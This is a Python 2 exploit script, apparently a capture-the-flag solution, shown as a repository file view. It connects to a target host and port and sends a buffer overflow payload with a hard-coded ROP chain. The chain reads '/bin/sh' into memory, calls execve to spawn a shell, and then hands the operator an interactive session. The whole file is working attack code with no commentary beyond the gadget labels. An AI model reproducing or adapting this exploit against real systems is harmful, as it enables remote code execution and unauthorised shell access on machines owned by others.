/
exploit.py
71 lines (57 loc) · 1.83 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python2
import sys, socket, telnetlib
from struct import *
def recvuntil(t):
data = ''
while not data.endswith(t):
tmp = s.recv(1)
if not tmp: break
data += tmp
return data
def interactive():
t = telnetlib.Telnet()
t.sock = s
t.interact()
def p32(x): return pack('<I', x)
def u32(x): return unpack('<I', x)[0]
def p64(x): return pack('<Q', x)
def u64(x): return unpack('<Q', x)[0]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
print recvuntil("Please tell me your name >> ")
s.send("A\n")
print recvuntil("Give me your message >> ")
p = "C" * 104
p += p64(0xc820080000)
p += p64(0x10)
p += "B" * (200-len(p))
p += p64(0xc820080000) + p64(0x10) + "A" * (192)
# ROPCHAIN read /bin/sh into bss
p += p64(0x00000000004016ea) #pop rax -> rax must be a valid address to use 0x0000000000470931 gadget
p+= p64(0x000000000059f920 + 1) # rax content
p += p64(0x0000000000470931) # pop rdi ; or byte ptr [rax + 0x39], cl ; ret
p += p64(0x0) # rdi value
p += p64(0x000000000046defd) #pop rsi
p += p64(0x000000000059f920) #bss address
p += p64(0x000000000046ec93) #pop rdx
p += p64(0x10) # bytes to read
p += p64(0x00000000004016ea) #pop rax -> number syscall
p += p64(0x0) # 0 = syscall read
p += p64(0x0000000000456889) #syscall; ret
# ROPCHAIN execve /bin/sh
p += p64(0x00000000004016ea) #pop rax
p+= p64(0x000000000059f920 + 100) # rax content
p += p64(0x000000000046defd) #pop rsi
p += p64(0x0)
p += p64(0x0000000000470931) # : pop rdi ; or byte ptr [rax + 0x39], cl ; ret
p += p64(0x59f920) # bss address
p += p64(0x00000000004016ea) #pop rax
p+= p64(59) # execve syscall = 59
p += p64(0x00000000004599ca) #pop rdx + ff2
p += p64(0x0)
p += p64(0x0000000000456889) # syscall
s.send(p + "\n")
s.send("/bin/sh\x00\n")
interactive()
s.close()
#